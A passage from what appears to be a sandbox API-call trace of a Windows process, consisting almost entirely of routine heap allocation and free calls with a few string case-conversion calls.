0x2aabd28 [0223.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb18 [0223.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabcc8 [0223.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0223.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcc8 | out: hHeap=0x2af0000) returned 1 [0223.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0223.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0223.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabbc0 [0223.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabad0 [0223.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba58 [0223.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0223.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba58 | out: hHeap=0x2af0000) returned 1 [0223.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0223.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabad0 | out: hHeap=0x2af0000) returned 1 [0223.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0223.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0223.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0223.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0223.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0223.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0223.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0223.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0223.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc68 | out: hHeap=0x2af0000) returned 1 [0223.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0223.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0223.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0223.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0223.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0223.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0223.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0223.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0223.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0223.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc50 | out: hHeap=0x2af0000) returned 1 [0223.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0223.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0223.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb78 | out: hHeap=0x2af0000) returned 1 [0223.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb90 | out: hHeap=0x2af0000) returned 1 [0223.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb30 | out: hHeap=0x2af0000) returned 1 [0223.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabba8 | out: hHeap=0x2af0000) returned 1 [0223.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0223.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabaa0 | out: hHeap=0x2af0000) returned 1 [0223.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb48 | out: hHeap=0x2af0000) returned 1 [0223.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba40 | out: hHeap=0x2af0000) returned 1 [0223.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabab8 | out: hHeap=0x2af0000) returned 1 [0223.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc98 | out: hHeap=0x2af0000) returned 1 [0223.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0223.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcb0 | out: hHeap=0x2af0000) returned 1 [0223.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc08 | out: hHeap=0x2af0000) returned 1 [0223.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba70 | out: hHeap=0x2af0000) returned 1 [0223.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb00 | out: hHeap=0x2af0000) returned 1 [0223.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7910 | out: hHeap=0x2af0000) returned 1 [0223.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0223.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0223.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0223.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0223.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865f58 [0223.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38667f8 | out: hHeap=0x2af0000) returned 1 [0223.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0223.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0223.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0223.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0223.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0223.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0223.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0223.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0223.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0223.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0223.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0223.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0223.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0223.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0223.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0223.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0223.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0223.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0223.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0223.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0223.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0223.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0223.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0223.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0223.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0223.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0223.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0223.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0223.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0223.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0223.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0223.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0223.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0223.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0223.363] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0223.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0223.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0223.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0223.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0223.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0223.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0223.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0223.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0223.363] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0223.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0223.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0223.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0223.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0223.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0223.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0223.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0223.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0223.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0223.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0223.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0223.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7100 [0223.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0223.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0223.364] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0223.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69910 [0223.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0223.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0223.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0223.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0223.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0223.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0223.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0223.364] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0223.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0223.364] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0223.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0223.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0223.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0223.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0223.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0223.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0223.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0223.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0223.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0223.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0223.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0223.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0223.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0223.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0223.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0223.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0223.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0223.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7220 [0223.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69b80 [0223.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0223.365] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0223.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0223.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0223.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69910 | out: hHeap=0x2af0000) returned 1 [0223.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0223.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0223.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0223.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0223.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f40 [0223.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69c10 [0223.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0223.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0223.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0223.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0223.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0223.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0223.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0223.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0223.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0223.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0223.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0223.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0223.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0223.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0223.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0223.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0223.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0223.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0223.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71d28 [0223.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0223.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0223.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0223.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ba8 [0223.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0223.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0223.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69c10 | out: hHeap=0x2af0000) returned 1 [0223.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0223.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0223.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0223.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0223.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0223.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0223.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0223.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0223.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0223.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0223.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0223.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0223.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0223.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0223.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0223.367] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0223.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0223.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab890 [0223.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0223.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0223.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0223.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0223.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0223.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0223.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0223.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0223.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0223.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0223.368] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0223.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0223.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0223.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0223.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0223.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0223.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0223.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0223.368] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0223.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0223.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0223.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0223.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0223.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0223.368] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0223.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0223.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0223.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0223.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0223.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0223.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0223.369] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 